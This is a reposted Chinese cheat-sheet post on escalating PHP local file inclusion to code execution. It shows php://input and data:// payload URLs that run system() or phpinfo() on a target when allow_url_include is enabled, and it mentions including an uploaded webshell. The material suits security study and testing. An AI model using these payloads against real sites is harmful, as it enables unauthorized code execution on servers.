當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

LFI 命令执行

發布時間：2024/4/14 编程问答 29 豆豆

生活随笔收集整理的這篇文章主要介紹了 LFI 命令执行小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

條件:

【條件】在allow_url_include = On 且 PHP >= 5.2.0

【優勢】直接POST php代碼并執行

【須知】必須使用包含切執行函數(比如 include require) 不能使用file_get_contents等用這些函數不會執行data/input里面函數。

【點評】這其實是一種思路而已 ?當allow_url_include打開的時候 ?隨便找個webshell上傳一句話都可以遠程包含了。

php://input

0x007.com/data.php?a=php://input

post提交:<?php ?system("set");?> ?任意的php代碼

data:

include $_GET['a'];

0x007.com/data.php?a=data:text/plain,<?php phpinfo();

0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=

0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=

轉載于:https://blog.51cto.com/0x007/1220703

以上是生活随笔為你收集整理的LFI 命令执行的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。